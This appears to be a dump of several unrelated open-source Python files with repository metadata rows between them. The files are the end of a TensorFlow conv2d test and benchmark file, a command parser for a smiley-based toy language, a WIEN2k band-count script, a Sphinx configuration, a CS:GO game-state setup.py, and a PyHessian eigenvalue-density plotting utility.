x = convolutional.conv2d(x, num_outputs, [1, kernel_w])
outputs = x
self.evaluate(variables.global_variables_initializer())
num_iterations = 4
for iter_index in xrange(num_iterations):
start = time.time()
session.run(outputs)
wall_time = time.time() - start
self.report_benchmark(
name="conv_stack_iter_%d" % iter_index, wall_time=wall_time)
tf_logging.info("conv_stack_iter_%d: %.4f" % (iter_index, wall_time))
def _bench_op(self, name, op, burn_iters, num_iters):
config = config_pb2.ConfigProto()
config.graph_options.rewrite_options.dependency_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
with session_lib.Session(config=config) as session:
self.evaluate(variables.global_variables_initializer())
self.run_op_benchmark(
session, op, burn_iters=burn_iters, min_iters=num_iters, name=name)
def benchmarkExplicitVsManualPadding(self):
if not test.is_gpu_available():
return
with ops.Graph().as_default():
burn_iters = 15
num_iters = 300
batch_size = 64
input = variables.Variable(
random_ops.random_uniform([
batch_size,
3,
224,
224
]))
filter = variables.Variable(random_ops.random_uniform([7, 7, 3, 64]))
strides = [1, 1, 2, 2]
padding = [(0, 0), (0, 0), (3, 3), (3, 3)]
output_explicit_pad = nn_ops.conv2d(
input, filter, strides, padding=padding, data_format="NCHW")
input_padded = array_ops.pad(input, padding)
output_manual_pad = nn_ops.conv2d(
input_padded, filter, strides, padding="VALID", data_format="NCHW")
self._bench_op("explicit_pad_forward", output_explicit_pad.op, burn_iters,
num_iters)
self._bench_op("manual_pad_forward", output_manual_pad.op, burn_iters,
num_iters)
input_grad_explicit_pad, filter_grad_explicit_pad = (
gradients_impl.gradients(output_explicit_pad, [input, filter]))
self._bench_op(
"explicit_pad_backward",
control_flow_ops.group(input_grad_explicit_pad,
filter_grad_explicit_pad), burn_iters,
num_iters)
input_grad_manual_pad, filter_grad_manual_pad = gradients_impl.gradients(
output_manual_pad, [input, filter])
self._bench_op(
"manual_pad_backward",
control_flow_ops.group(input_grad_manual_pad, filter_grad_manual_pad),
burn_iters, num_iters)
def benchmarkExplicitVsSamePaddingGraph(self):
if not test.is_gpu_available():
return
with ops.Graph().as_default():
burn_iters = 15
num_convs = 20
num_iters = 50
batch_size = 64
input = variables.Variable(
random_ops.random_uniform([
batch_size,
256,
14,
14
]))
filter = variables.Variable(random_ops.random_uniform([3, 3, 256, 256]))
strides = [1, 1, 1, 1]
padding = [(0, 0), (0, 0), (1, 1), (1, 1)]
output_explicit_pad = input
output_same_pad = input
for _ in range(num_convs):
output_explicit_pad = nn_ops.conv2d(
output_explicit_pad,
filter,
strides,
padding=padding,
data_format="NCHW")
output_same_pad = nn_ops.conv2d(
output_same_pad,
filter,
strides,
padding="SAME",
data_format="NCHW")
grad_explicit_pad, = gradients_impl.gradients(output_explicit_pad, filter)
grad_same_pad, = gradients_impl.gradients(output_same_pad, filter)
self._bench_op("graph_explicit_pad", grad_explicit_pad.op, burn_iters,
num_iters)
self._bench_op("graph_same_pad", grad_same_pad.op, burn_iters, num_iters)
def benchmarkExplicitVsSamePaddingEager(self):
if not test.is_gpu_available():
return
with context.eager_mode():
burn_iters = 15
num_convs = 20
num_iters = 50
batch_size = 64
input = variables.Variable(
random_ops.random_uniform([
batch_size,
256,
14,
14
]))
filter = variables.Variable(random_ops.random_uniform([3, 3, 256, 256]))
strides = [1, 1, 1, 1]
padding = [(0, 0), (0, 0), (1, 1), (1, 1)]
output_explicit_pad = input
output_same_pad = input
for _ in range(burn_iters):
output_explicit_pad = nn_ops.conv2d(
output_explicit_pad,
filter,
strides,
padding=padding,
data_format="NCHW")
output_same_pad = nn_ops.conv2d(
output_same_pad,
filter,
strides,
padding="SAME",
data_format="NCHW")
start = time.time()
for _ in range(num_iters):
with backprop.GradientTape() as tape:
for _ in range(num_convs):
output_explicit_pad = nn_ops.conv2d(
output_explicit_pad,
filter,
strides,
padding=padding,
data_format="NCHW")
tape.gradient(output_explicit_pad, filter)
end = time.time()
self.report_benchmark(
name="eager_explicit_pad",
wall_time=(end - start) / num_iters,
iters=num_iters)
start = time.time()
for _ in range(num_iters):
with backprop.GradientTape() as tape:
for _ in range(num_convs):
output_same_pad = nn_ops.conv2d(
output_same_pad,
filter,
strides,
padding="SAME",
data_format="NCHW")
tape.gradient(output_same_pad, filter)
end = time.time()
self.report_benchmark(
name="eager_same_pad",
wall_time=(end - start) / num_iters,
iters=num_iters)
def GetInceptionFwdTest(input_size, filter_size, stride, padding,
gpu_only=False):
def Test(self):
if gpu_only and not test.is_gpu_available():
tf_logging.info("Skipping InceptionFwd %s", (input_size, filter_size,
stride, padding))
return
tf_logging.info("Testing InceptionFwd %s", (input_size, filter_size, stride,
padding))
self._CompareFwdValues(input_size, filter_size, [stride, stride], padding)
return Test
def GetInceptionFwdDilatedConvTest(input_size, filter_size, stride, padding):
def Test(self):
if stride == 1:
tf_logging.info("Testing InceptionFwd with dilations %s",
(input_size, filter_size, stride, padding))
self._VerifyDilatedConvValues(
tensor_in_sizes=input_size,
filter_in_sizes=filter_size,
strides=[stride, stride],
dilations=[2, 2],
padding=padding,
rtol=5e-4)
return Test
def GetInceptionBackInputTest(input_size, filter_size, output_size, stride,
padding,
gpu_only=False):
def Test(self):
if gpu_only and not test.is_gpu_available():
tf_logging.info("Skipping InceptionBackInput %s",
(input_size, filter_size, output_size, stride, padding))
return
tf_logging.info("Testing InceptionBackInput %s",
(input_size, filter_size, output_size, stride, padding))
self._CompareBackpropInput(input_size, filter_size, output_size,
[stride, stride], padding)
return Test
def GetInceptionBackFilterTest(input_size, filter_size, output_size, strides,
padding, gpu_only=False):
def Test(self):
if gpu_only and not test.is_gpu_available():
tf_logging.info("Skipping InceptionBackFilter %s",
(input_size, filter_size, output_size, strides, padding))
return
tf_logging.info("Testing InceptionBackFilter %s",
(input_size, filter_size, output_size, strides, padding))
self._CompareBackFilter(input_size, filter_size, output_size, strides,
padding)
return Test
if __name__ == "__main__":
for index, (input_size_, filter_size_, output_size_, stride_,
padding_) in enumerate(GetShrunkInceptionShapes()):
setattr(Conv2DTest, "testInceptionFwd_" + str(index),
test_util.run_in_graph_and_eager_modes(
GetInceptionFwdTest(input_size_, filter_size_, stride_,
padding_)))
setattr(
Conv2DTest, "testInceptionFwdDilatedConv_" + str(index),
test_util.run_in_graph_and_eager_modes(GetInceptionFwdDilatedConvTest(
input_size_, filter_size_, stride_, padding_)))
setattr(Conv2DTest, "testInceptionBackInput_" + str(index),
test_util.run_in_graph_and_eager_modes(
GetInceptionBackInputTest(input_size_, filter_size_,
output_size_, stride_, padding_)))
setattr(Conv2DTest, "testInceptionBackFilter_" + str(index),
test_util.run_in_graph_and_eager_modes(
GetInceptionBackFilterTest(input_size_, filter_size_,
output_size_, [stride_, stride_],
padding_)))
ishape = [1, 400, 400, 1]
fshape = [1, 1, 1, 256]
oshape = [1, 400, 400, 256]
setattr(Conv2DTest, "testInceptionFwd_No_Winograd_Nonfused",
test_util.run_in_graph_and_eager_modes(
GetInceptionFwdTest(ishape, fshape, 1, "SAME", gpu_only=True)))
setattr(Conv2DTest, "testInceptionFwdDilatedConv_No_Winograd_Nonfused",
test_util.run_in_graph_and_eager_modes(
GetInceptionFwdDilatedConvTest(ishape, fshape, 1, "SAME")))
setattr(Conv2DTest, "testInceptionBackInput_No_Winograd_Nonfused",
test_util.run_in_graph_and_eager_modes(
GetInceptionBackInputTest(ishape, fshape, oshape, 1, "SAME",
gpu_only=True)))
setattr(Conv2DTest, "testInceptionBackFilter_No_Winograd_Nonfused",
test_util.run_in_graph_and_eager_modes(
GetInceptionBackFilterTest(ishape, fshape, oshape, [1, 1], "SAME",
gpu_only=True)))
test.main()
| true | true |
f72343ede96ccf965e3565c07a8472b33c4cf857 | 4,086 | py | Python | lib/command.py | autowitch/llama | cc18e1f646e6deae5a461b8a4f3a914463999b35 | [
"MIT"
] | 1 | 2018-12-21T22:03:30.000Z | 2018-12-21T22:03:30.000Z | lib/command.py | autowitch/llama | cc18e1f646e6deae5a461b8a4f3a914463999b35 | [
"MIT"
] | null | null | null | lib/command.py | autowitch/llama | cc18e1f646e6deae5a461b8a4f3a914463999b35 | [
"MIT"
] | 1 | 2021-05-16T07:11:41.000Z | 2021-05-16T07:11:41.000Z | import re
from lib.command_constants import CommandConstants
from lib.errors import ParseError
class Command(object):
"""This is primarily a data bucket that holds information about
a specific command"""
def __init__(self, line="", free_format=False, tight=False):
super(Command, self).__init__()
self.free_format = free_format
self.tight = tight
self.smiley = ''
self.importance = 3
self.command = ''
self.right_hand_indicator = None
self.original_importance = 3
self.topper = ''
self.eyes = ''
self.nose = ''
self.mouth = ''
self.execution_probability = 100
self.command_type = CommandConstants.UNKNOWN
if line:
self.parse(line)
def parse_smiley(self, line, orig):
m = re.match(CommandConstants.smile_expr, line)
if m:
smiley = m.group('smiley')
remainder = m.group('remainder')
# TODO: Mixed sets and returns
self.topper = m.group('topper')
self.eyes = m.group('eyes')
self.nose = m.group('nose')
self.mouth = m.group('mouth')
if self.eyes == '%':
self.execution_probability = 50
else:
raise ParseError('%s does not start with a smiley' % orig)
return smiley, remainder
def parse_command(self, line, orig):
command_expr = "\s*(?P<command>[^!]+)(?P<remainder>.*)$"
m = re.match(command_expr, line)
if m:
command = m.group('command')
remainder = m.group('remainder')
else:
raise ParseError("%s does not have a command" % orig)
return command.strip(), remainder
def parse_importance(self, line, orig):
importance_expr = "\s*(?P<importance>![!1]*)\s*(?P<remainder>.*)$"
m = re.match(importance_expr, line)
if m:
importance = m.group('importance')
remainder = m.group('remainder')
else:
raise ParseError('%s does not have any importance' % orig)
return len(importance), remainder
def parse_rhi(self, line, orig):
rhi_expr = "(?P<rhi>[^\s]*)\s*(?P<remainder>.*)"
m = re.match(rhi_expr, line)
rhi = ""
remainder = ""
if m:
rhi = m.group("rhi")
remainder = m.group("remainder")
return rhi, remainder
def __str__(self):
return "%s %s %s %s" % (self.smiley, self.command,
self.importance,
self.right_hand_indicator)
def parse(self, line):
orig = line
if self.free_format:
self.smiley, line = self.parse_smiley(line, orig)
self.command, line = self.parse_command(line, orig)
self.importance, line = self.parse_importance(line, orig)
self.original_importance = self.importance
self.right_hand_indicator, line = self.parse_rhi(line, orig)
elif self.tight:
self.smiley, tmp = self.parse_smiley(line[0:4].strip(), orig)
self.command, tmp = self.parse_command(line[4:49].strip(), orig)
self.importance, tmp = self.parse_importance(line[49:64].strip(), orig)
self.original_importance = self.importance
self.right_hand_indicator, tmp = self.parse_rhi(line[64:79].strip(), orig)
else:
self.smiley, tmp = self.parse_smiley(line[0:4].strip(), orig)
self.command, tmp = self.parse_command(line[4:79].strip(), orig)
self.importance, tmp = self.parse_importance(line[79:131].strip(), orig)
self.original_importance = self.importance
self.right_hand_indicator, tmp = self.parse_rhi(line[131:200].strip(), orig)
def __repr__(self):
return "<%s, %s, %s (%s), %s: %s>" % (self.smiley, self.command, self.importance,
self.original_importance, self.right_hand_indicator,
self.command_type)
| 37.145455 | 90 | 0.568282 | import re
from lib.command_constants import CommandConstants
from lib.errors import ParseError
class Command(object):
def __init__(self, line="", free_format=False, tight=False):
super(Command, self).__init__()
self.free_format = free_format
self.tight = tight
self.smiley = ''
self.importance = 3
self.command = ''
self.right_hand_indicator = None
self.original_importance = 3
self.topper = ''
self.eyes = ''
self.nose = ''
self.mouth = ''
self.execution_probability = 100
self.command_type = CommandConstants.UNKNOWN
if line:
self.parse(line)
def parse_smiley(self, line, orig):
m = re.match(CommandConstants.smile_expr, line)
if m:
smiley = m.group('smiley')
remainder = m.group('remainder')
self.topper = m.group('topper')
self.eyes = m.group('eyes')
self.nose = m.group('nose')
self.mouth = m.group('mouth')
if self.eyes == '%':
self.execution_probability = 50
else:
raise ParseError('%s does not start with a smiley' % orig)
return smiley, remainder
def parse_command(self, line, orig):
command_expr = "\s*(?P<command>[^!]+)(?P<remainder>.*)$"
m = re.match(command_expr, line)
if m:
command = m.group('command')
remainder = m.group('remainder')
else:
raise ParseError("%s does not have a command" % orig)
return command.strip(), remainder
def parse_importance(self, line, orig):
importance_expr = "\s*(?P<importance>![!1]*)\s*(?P<remainder>.*)$"
m = re.match(importance_expr, line)
if m:
importance = m.group('importance')
remainder = m.group('remainder')
else:
raise ParseError('%s does not have any importance' % orig)
return len(importance), remainder
def parse_rhi(self, line, orig):
rhi_expr = "(?P<rhi>[^\s]*)\s*(?P<remainder>.*)"
m = re.match(rhi_expr, line)
rhi = ""
remainder = ""
if m:
rhi = m.group("rhi")
remainder = m.group("remainder")
return rhi, remainder
def __str__(self):
return "%s %s %s %s" % (self.smiley, self.command,
self.importance,
self.right_hand_indicator)
def parse(self, line):
orig = line
if self.free_format:
self.smiley, line = self.parse_smiley(line, orig)
self.command, line = self.parse_command(line, orig)
self.importance, line = self.parse_importance(line, orig)
self.original_importance = self.importance
self.right_hand_indicator, line = self.parse_rhi(line, orig)
elif self.tight:
self.smiley, tmp = self.parse_smiley(line[0:4].strip(), orig)
self.command, tmp = self.parse_command(line[4:49].strip(), orig)
self.importance, tmp = self.parse_importance(line[49:64].strip(), orig)
self.original_importance = self.importance
self.right_hand_indicator, tmp = self.parse_rhi(line[64:79].strip(), orig)
else:
self.smiley, tmp = self.parse_smiley(line[0:4].strip(), orig)
self.command, tmp = self.parse_command(line[4:79].strip(), orig)
self.importance, tmp = self.parse_importance(line[79:131].strip(), orig)
self.original_importance = self.importance
self.right_hand_indicator, tmp = self.parse_rhi(line[131:200].strip(), orig)
def __repr__(self):
return "<%s, %s, %s (%s), %s: %s>" % (self.smiley, self.command, self.importance,
self.original_importance, self.right_hand_indicator,
self.command_type)
| true | true |
f72343f0b5bc545893d36b9a7b421656a7206a13 | 3,456 | py | Python | src/python/findNbands.py | dmft-wien2k/dmft-wien2k-v2 | 83481be27e8a9ff14b9635d6cc1cd9d96f053487 | [
"Apache-2.0"
] | 5 | 2021-05-13T13:04:26.000Z | 2022-01-18T10:08:09.000Z | src/python/findNbands.py | dmft-wien2k/dmft-wien2k-v2 | 83481be27e8a9ff14b9635d6cc1cd9d96f053487 | [
"Apache-2.0"
] | 2 | 2016-07-12T21:37:53.000Z | 2016-07-12T21:42:01.000Z | src/python/findNbands.py | dmft-wien2k/dmft-wien2k | 83481be27e8a9ff14b9635d6cc1cd9d96f053487 | [
"Apache-2.0"
] | 2 | 2016-07-22T15:46:56.000Z | 2016-08-02T15:05:12.000Z | #!/usr/bin/env python
# @Copyright 2007 Kristjan Haule
from scipy import *
def findNbands(Emin,Emax,enefiles,strfile):
Ry2eV = 13.6056923
# Find 'nat' in the structure file
fs = open(strfile,'r')
fs.next()
line = fs.next()
lattic = line[:4]
nat = int(line[4+23:4+23+3])
fs.close()
print 'Number of all atoms found in struct file', nat
nemin=10000
nemax=0
for enefile in enefiles:
# Find nemin,nemax in energy file
fi = open(enefile,'r')
for i in range(nat):
fi.next() # linearization Energy
fi.next() # linearization Energy
try:
for k in range(1,1000000):
line = fi.next()
S,T,Z = float(line[:19]),float(line[19:2*19]),float(line[2*19:3*19])
KNAME = line[3*19:3*19+10]
N, NEn = int(line[67:67+6]), int(line[67+6:67+6*2])
nemin_=1
nemax_=0
for ii in range(NEn):
line = fi.next().split()
num, e1 = int(line[0]), float(line[1])
e1 *= Ry2eV
if (e1<Emin): nemin_ += 1
if (e1<Emax): nemax_ += 1
nemin = min(nemin,nemin_)
nemax = max(nemax,nemax_)
except StopIteration:
fi.close()
print 'file:', enefile, 'nemin=', nemin, 'nemax=', nemax
print 'Finally set nemin=', nemin, 'nemax=', nemax
return (nemin,nemax)
if __name__ == '__main__':
import os
import sys
import glob
import re
import utils
Ry2eV = 13.6056923
if len(sys.argv)<3:
exmin=-10
exmax= 10
else:
exmin=float(sys.argv[1])
exmax=float(sys.argv[2])
print 'Energy window:', exmin, exmax
w2k = utils.W2kEnvironment()
# looking for EF
if os.path.isfile('EF.dat'):
EF = float(open('EF.dat').read())
else:
fname = w2k.case+".scf2"
if os.path.isfile(fname) or os.path.isfile(fname+'up'):
if os.path.isfile(fname):
fscf = open(fname, 'r')
else:
fscf = open(fname+'up', 'r')
lines = fscf.readlines()
for line in lines:
if re.match(r':FER', line) is not None:
EF = float(line[38:])*Ry2eV
print 'EF from scf file : ', EF
break
else:
EF =float(open(w2k.case+'.indmf1').readlines()[1].split()[1])
print 'EF from indmf1 file : ', EF
print 'EF=', EF
#Emin,Emax = -1.331295, 18.668705
Emin, Emax = EF+exmin, EF+exmax
print 'Emin, Emax=', Emin, Emax
strfile = w2k.case+'.struct'
enefiles = glob.glob(w2k.case+'.energy'+'*')
enefiles = filter(lambda fil: os.path.getsize(fil)>0, enefiles) # Remove empty files
for fil in enefiles:
if re.match(w2k.case+'.energyso', fil): # Spin-orbit on, remove non-spin-orbit files
enefiles = filter(lambda fil: re.match(w2k.case+'.energyso', fil) is not None, enefiles) # Remove empty files
break
print 'enefiles=', enefiles
(nemin,nemax) = findNbands(Emin,Emax,enefiles,strfile)
print 'nemin,nemax=', nemin, nemax
print 'Replace second line of '+w2k.case+'.indmfl with'
print nemin,nemax,1,4,'# hybridization nmin, nmax, renormalize for interstitials, projection type'
| 32.914286 | 121 | 0.532407 |
from scipy import *
def findNbands(Emin,Emax,enefiles,strfile):
Ry2eV = 13.6056923
fs = open(strfile,'r')
fs.next()
line = fs.next()
lattic = line[:4]
nat = int(line[4+23:4+23+3])
fs.close()
print 'Number of all atoms found in struct file', nat
nemin=10000
nemax=0
for enefile in enefiles:
fi = open(enefile,'r')
for i in range(nat):
fi.next()
fi.next()
try:
for k in range(1,1000000):
line = fi.next()
S,T,Z = float(line[:19]),float(line[19:2*19]),float(line[2*19:3*19])
KNAME = line[3*19:3*19+10]
N, NEn = int(line[67:67+6]), int(line[67+6:67+6*2])
nemin_=1
nemax_=0
for ii in range(NEn):
line = fi.next().split()
num, e1 = int(line[0]), float(line[1])
e1 *= Ry2eV
if (e1<Emin): nemin_ += 1
if (e1<Emax): nemax_ += 1
nemin = min(nemin,nemin_)
nemax = max(nemax,nemax_)
except StopIteration:
fi.close()
print 'file:', enefile, 'nemin=', nemin, 'nemax=', nemax
print 'Finally set nemin=', nemin, 'nemax=', nemax
return (nemin,nemax)
if __name__ == '__main__':
import os
import sys
import glob
import re
import utils
Ry2eV = 13.6056923
if len(sys.argv)<3:
exmin=-10
exmax= 10
else:
exmin=float(sys.argv[1])
exmax=float(sys.argv[2])
print 'Energy window:', exmin, exmax
w2k = utils.W2kEnvironment()
if os.path.isfile('EF.dat'):
EF = float(open('EF.dat').read())
else:
fname = w2k.case+".scf2"
if os.path.isfile(fname) or os.path.isfile(fname+'up'):
if os.path.isfile(fname):
fscf = open(fname, 'r')
else:
fscf = open(fname+'up', 'r')
lines = fscf.readlines()
for line in lines:
if re.match(r':FER', line) is not None:
EF = float(line[38:])*Ry2eV
print 'EF from scf file : ', EF
break
else:
EF =float(open(w2k.case+'.indmf1').readlines()[1].split()[1])
print 'EF from indmf1 file : ', EF
print 'EF=', EF
Emin, Emax = EF+exmin, EF+exmax
print 'Emin, Emax=', Emin, Emax
strfile = w2k.case+'.struct'
enefiles = glob.glob(w2k.case+'.energy'+'*')
enefiles = filter(lambda fil: os.path.getsize(fil)>0, enefiles)
for fil in enefiles:
if re.match(w2k.case+'.energyso', fil):
enefiles = filter(lambda fil: re.match(w2k.case+'.energyso', fil) is not None, enefiles)
break
print 'enefiles=', enefiles
(nemin,nemax) = findNbands(Emin,Emax,enefiles,strfile)
print 'nemin,nemax=', nemin, nemax
print 'Replace second line of '+w2k.case+'.indmfl with'
print nemin,nemax,1,4,'# hybridization nmin, nmax, renormalize for interstitials, projection type'
| false | true |
f723442118c4bb97e93ace12b12b7c779da0508f | 2,580 | py | Python | docs/conf.py | thijsmie/qiskit-quantum-knn | 7fbecab3644306cd601a7562b8f76a29d0190700 | [
"Apache-2.0"
] | 9 | 2020-12-29T02:12:36.000Z | 2021-11-15T17:26:48.000Z | docs/conf.py | thijsmie/qiskit-quantum-knn | 7fbecab3644306cd601a7562b8f76a29d0190700 | [
"Apache-2.0"
] | 5 | 2020-11-09T11:25:37.000Z | 2021-11-02T11:13:40.000Z | docs/conf.py | thijsmie/qiskit-quantum-knn | 7fbecab3644306cd601a7562b8f76a29d0190700 | [
"Apache-2.0"
] | 9 | 2020-11-11T20:19:00.000Z | 2022-02-06T16:17:34.000Z | # Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('exts'))
sys.path.append('.')
# the most commonly used links in the docstrings are here (for extlinks)
from links import *
# -- Project information -----------------------------------------------------
project = 'qiskit-quantum-knn'
copyright = '2020, Daniël Kok'
author = 'Daniël Kok'
# The full version, including alpha/beta/rc tags
release = 'v1.0.0'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.coverage',
'sphinx.ext.extlinks',
'sphinx.ext.napoleon',
'sphinx.ext.mathjax',
'sphinx.ext.viewcode',
'jupyter_sphinx'
]
autodoc_member_order = 'bysource'
mathjax_path = 'https://cdn.jsdelivr.net/npm/mathjax@2/MathJax.js?config=TeX-AMS-MML_HTMLorMML'
napoleon_google_docstring = True
napoleon_include_private_with_doc = True
napoleon_use_param = False
napoleon_use_ivar = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# decide whether module names are prepended to all object names.
add_module_names = False
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static'] | 33.947368 | 95 | 0.689147 |
import os
import sys
sys.path.insert(0, os.path.abspath('exts'))
sys.path.append('.')
from links import *
project = 'qiskit-quantum-knn'
copyright = '2020, Daniël Kok'
author = 'Daniël Kok'
release = 'v1.0.0'
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.coverage',
'sphinx.ext.extlinks',
'sphinx.ext.napoleon',
'sphinx.ext.mathjax',
'sphinx.ext.viewcode',
'jupyter_sphinx'
]
autodoc_member_order = 'bysource'
mathjax_path = 'https://cdn.jsdelivr.net/npm/mathjax@2/MathJax.js?config=TeX-AMS-MML_HTMLorMML'
napoleon_google_docstring = True
napoleon_include_private_with_doc = True
napoleon_use_param = False
napoleon_use_ivar = True
templates_path = ['_templates']
add_module_names = False
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
html_theme = 'sphinx_rtd_theme'
html_static_path = ['_static'] | true | true |
f72344764b087774bb46161e232b9792ee87baaa | 891 | py | Python | setup.py | paulnbrd/csgogsi | b0bfb422cd62f92c888c746a873c719bad45753c | [
"MIT"
] | null | null | null | setup.py | paulnbrd/csgogsi | b0bfb422cd62f92c888c746a873c719bad45753c | [
"MIT"
] | null | null | null | setup.py | paulnbrd/csgogsi | b0bfb422cd62f92c888c746a873c719bad45753c | [
"MIT"
] | null | null | null | import setuptools
import csgogsi
print("CSGOGSI Installation")
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setuptools.setup(
name="csgogsi", # Replace with your own username
version=csgogsi.__version__,
author=csgogsi.__author__,
author_email="python-project@paulinux.fr",
description="Counter-Strike: Global Offensive Game State Integration in Python",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/paulnbrd/csgogsi",
project_urls={
"Bug Tracker": "https://github.com/paulnbrd/csgogsi/issues",
},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
packages=setuptools.find_packages(),
python_requires=">=3.6",
)
| 30.724138 | 84 | 0.687991 | import setuptools
import csgogsi
print("CSGOGSI Installation")
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setuptools.setup(
name="csgogsi",
version=csgogsi.__version__,
author=csgogsi.__author__,
author_email="python-project@paulinux.fr",
description="Counter-Strike: Global Offensive Game State Integration in Python",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/paulnbrd/csgogsi",
project_urls={
"Bug Tracker": "https://github.com/paulnbrd/csgogsi/issues",
},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
packages=setuptools.find_packages(),
python_requires=">=3.6",
)
| true | true |
f72345e56a8064f220561bf4ec3d8ec66cad1198 | 2,486 | py | Python | density_plot.py | vikranth22446/PyHessian | e8b1fbadb24349eef8f3a137ecfd27dfc6e3bb53 | [
"MIT"
] | 357 | 2019-12-13T01:59:00.000Z | 2022-03-31T14:00:45.000Z | density_plot.py | vikranth22446/PyHessian | e8b1fbadb24349eef8f3a137ecfd27dfc6e3bb53 | [
"MIT"
] | 12 | 2020-02-15T13:08:02.000Z | 2022-03-28T04:03:37.000Z | density_plot.py | vikranth22446/PyHessian | e8b1fbadb24349eef8f3a137ecfd27dfc6e3bb53 | [
"MIT"
] | 62 | 2019-12-13T18:45:07.000Z | 2022-03-09T17:14:30.000Z | #*
# @file Different utility functions
# Copyright (c) Zhewei Yao, Amir Gholami
# All rights reserved.
# This file is part of PyHessian library.
#
# PyHessian is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# PyHessian is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with PyHessian. If not, see <http://www.gnu.org/licenses/>.
#*
import math
import numpy as np
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
def get_esd_plot(eigenvalues, weights):
density, grids = density_generate(eigenvalues, weights)
plt.semilogy(grids, density + 1.0e-7)
plt.ylabel('Density (Log Scale)', fontsize=14, labelpad=10)
plt.xlabel('Eigenvlaue', fontsize=14, labelpad=10)
plt.xticks(fontsize=12)
plt.yticks(fontsize=12)
plt.axis([np.min(eigenvalues) - 1, np.max(eigenvalues) + 1, None, None])
plt.tight_layout()
plt.savefig('example.pdf')
def density_generate(eigenvalues,
weights,
num_bins=10000,
sigma_squared=1e-5,
overhead=0.01):
eigenvalues = np.array(eigenvalues)
weights = np.array(weights)
lambda_max = np.mean(np.max(eigenvalues, axis=1), axis=0) + overhead
lambda_min = np.mean(np.min(eigenvalues, axis=1), axis=0) - overhead
grids = np.linspace(lambda_min, lambda_max, num=num_bins)
sigma = sigma_squared * max(1, (lambda_max - lambda_min))
num_runs = eigenvalues.shape[0]
density_output = np.zeros((num_runs, num_bins))
for i in range(num_runs):
for j in range(num_bins):
x = grids[j]
tmp_result = gaussian(eigenvalues[i, :], x, sigma)
density_output[i, j] = np.sum(tmp_result * weights[i, :])
density = np.mean(density_output, axis=0)
normalization = np.sum(density) * (grids[1] - grids[0])
density = density / normalization
return density, grids
def gaussian(x, x0, sigma_squared):
return np.exp(-(x0 - x)**2 /
(2.0 * sigma_squared)) / np.sqrt(2 * np.pi * sigma_squared)
| 34.527778 | 77 | 0.672969 |
import math
import numpy as np
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
def get_esd_plot(eigenvalues, weights):
density, grids = density_generate(eigenvalues, weights)
plt.semilogy(grids, density + 1.0e-7)
plt.ylabel('Density (Log Scale)', fontsize=14, labelpad=10)
plt.xlabel('Eigenvlaue', fontsize=14, labelpad=10)
plt.xticks(fontsize=12)
plt.yticks(fontsize=12)
plt.axis([np.min(eigenvalues) - 1, np.max(eigenvalues) + 1, None, None])
plt.tight_layout()
plt.savefig('example.pdf')
def density_generate(eigenvalues,
weights,
num_bins=10000,
sigma_squared=1e-5,
overhead=0.01):
eigenvalues = np.array(eigenvalues)
weights = np.array(weights)
lambda_max = np.mean(np.max(eigenvalues, axis=1), axis=0) + overhead
lambda_min = np.mean(np.min(eigenvalues, axis=1), axis=0) - overhead
grids = np.linspace(lambda_min, lambda_max, num=num_bins)
sigma = sigma_squared * max(1, (lambda_max - lambda_min))
num_runs = eigenvalues.shape[0]
density_output = np.zeros((num_runs, num_bins))
for i in range(num_runs):
for j in range(num_bins):
x = grids[j]
tmp_result = gaussian(eigenvalues[i, :], x, sigma)
density_output[i, j] = np.sum(tmp_result * weights[i, :])
density = np.mean(density_output, axis=0)
normalization = np.sum(density) * (grids[1] - grids[0])
density = density / normalization
return density, grids
def gaussian(x, x0, sigma_squared):
return np.exp(-(x0 - x)**2 /
(2.0 * sigma_squared)) / np.sqrt(2 * np.pi * sigma_squared)
| true | true |
f723473a1ae662d8cc65e47de582a5124c743744 | 4,677 | py | Python | evals/gain/gain_fixm.py | nokia/integratedimputation | ca72bda54cb66e99d79ff0b174cf8f99ccb554ba | [
"BSD-3-Clause"
] | 2 | 2022-01-13T13:05:38.000Z | 2022-01-17T10:06:58.000Z | evals/gain/gain_fixm.py | nokia/integratedimputation | ca72bda54cb66e99d79ff0b174cf8f99ccb554ba | [
"BSD-3-Clause"
] | null | null | null | evals/gain/gain_fixm.py | nokia/integratedimputation | ca72bda54cb66e99d79ff0b174cf8f99ccb554ba | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
# © 2021 Nokia
#
